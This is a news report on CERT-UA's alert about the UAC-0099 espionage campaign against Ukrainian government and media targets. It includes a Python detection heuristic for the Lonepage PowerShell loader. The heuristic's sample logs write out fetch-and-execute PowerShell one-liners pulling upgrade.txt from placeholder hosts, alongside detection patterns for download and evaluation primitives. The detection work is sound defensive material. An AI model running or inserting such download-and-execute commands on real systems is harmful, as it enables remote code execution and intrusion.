6 June 2023

Cyber-espionage campaign targets government orgs and media in Ukraine

A cyber-espionage operation has been targeting Ukrainian government organizations and editors working for media outlets since at least the second half of 2022, the Computer Emergency Response Team of Ukraine (CERT-UA) has warned in a new security alert.

The espionage campaign involves malicious files (.HTA, .EXE, .RAR, .LNK) delivered via email and messaging apps that drop a PowerShell script called ‘Lonepage’ onto the compromised machine. In turn, Lonepage downloads a text file (“upgrade.txt”) from an attacker-controlled server; the file contains PowerShell commands that are then executed on the target system.
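The infection chain above comes down to one detectable behaviour: a PowerShell process fetches a remote text file and hands its contents to an evaluator. The script below, added here as an illustration and not part of the CERT-UA alert or any Lonepage sample, runs a small heuristic over PowerShell ScriptBlock logging text (Event ID 4104 style) and flags blocks that combine a download primitive with an execution primitive. The sample log entries are constructed for this example; the host names and addresses in them are placeholders (documentation ranges and the reserved .invalid TLD), and only the file name upgrade.txt is taken from the alert.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample ScriptBlock log entries. Not real telemetry: the addresses are
# documentation/reserved values; "upgrade.txt" is the file name named in the CERT-UA alert.
SAMPLE_SCRIPT_BLOCKS = [
    "$c = New-Object Net.WebClient; $r = $c.DownloadString('http://198.51.100.7/upgrade.txt'); Invoke-Expression $r",
    "IEX (Invoke-WebRequest -Uri 'http://example.invalid/upgrade.txt' -UseBasicParsing).Content",
    "Get-ChildItem C:\\Users\\ -Recurse | Where-Object { $_.Extension -eq '.docx' }",
    "Invoke-WebRequest -Uri 'https://example.invalid/report.pdf' -OutFile 'C:\\Temp\\report.pdf'",
    "$s = (New-Object Net.WebClient).DownloadString('http://192.0.2.10/list.txt'); $s -split \"`n\" | ForEach-Object { Write-Host $_ }",
]

# Primitives that pull content off the network.
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\birm\b|Start-BitsTransfer",
    re.IGNORECASE,
)
# Primitives that turn a string into running code.
EXEC_RE = re.compile(
    r"Invoke-Expression|\biex\b|\[scriptblock\]::Create|Invoke-Command\s+-ScriptBlock",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


@dataclass
class Finding:
    index: int                      # position of the script block in the input list
    url: str                        # first URL seen in the block, "" if none
    reasons: List[str] = field(default_factory=list)


def classify(block: str) -> List[str]:
    """Return the reasons a script block looks like a fetch-and-execute loader.

    An empty list means the block did not trip the heuristic. A download on its own
    (e.g. saving a PDF to disk) is deliberately not flagged; it is the combination
    with an evaluator that matches the Lonepage pattern described in the alert.
    """
    reasons: List[str] = []
    if DOWNLOAD_RE.search(block) and EXEC_RE.search(block):
        reasons.append("remote fetch fed into a PowerShell evaluator")
        m = URL_RE.search(block)
        if m and m.group(0).lower().endswith(".txt"):
            # Payload disguised as a harmless text file, as with upgrade.txt.
            reasons.append("payload retrieved as a plain .txt file")
    return reasons


def flag_script_blocks(blocks: List[str]) -> List[Finding]:
    """Run classify() over a list of script blocks and collect the hits."""
    findings: List[Finding] = []
    for i, block in enumerate(blocks):
        reasons = classify(block)
        if reasons:
            m = URL_RE.search(block)
            findings.append(Finding(i, m.group(0) if m else "", reasons))
    return findings


if __name__ == "__main__":
    for f in flag_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {f.index}: {f.url or '<no url>'} :: {'; '.join(f.reasons)}")
```

Only the first two sample blocks are flagged: the third is local file enumeration, the fourth downloads a file to disk without evaluating it, and the fifth fetches a .txt but only prints it. The heuristic is intentionally narrow so it can run on high-volume ScriptBlock logs; the URL it extracts is what an analyst would pivot on to find the staging server.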

Additionally, several malware tools have been observed in this operation, such as Thumbchop (an information stealer that targets popular web browsers like Chrome and Opera) and the Clogflag keylogger. The attackers use Tor and SSH for remote access to the target machine.

During the analysis the experts also found two samples of Go-based malware, namely, Seaglow and Overjam.

In some cases the threat actor attempted to move deeper into the victim's network with the goal of compromising privileged users and gaining access to corporate information systems.

CERT-UA says that between 2022 and 2023 the threat actor compromised several dozen victims in Ukraine. The team is tracking this malicious activity as UAC-0099.

Last week, the Ukrainian defenders warned of a new wave of SmokeLoader attacks orchestrated by a threat actor known as UAC-0006.

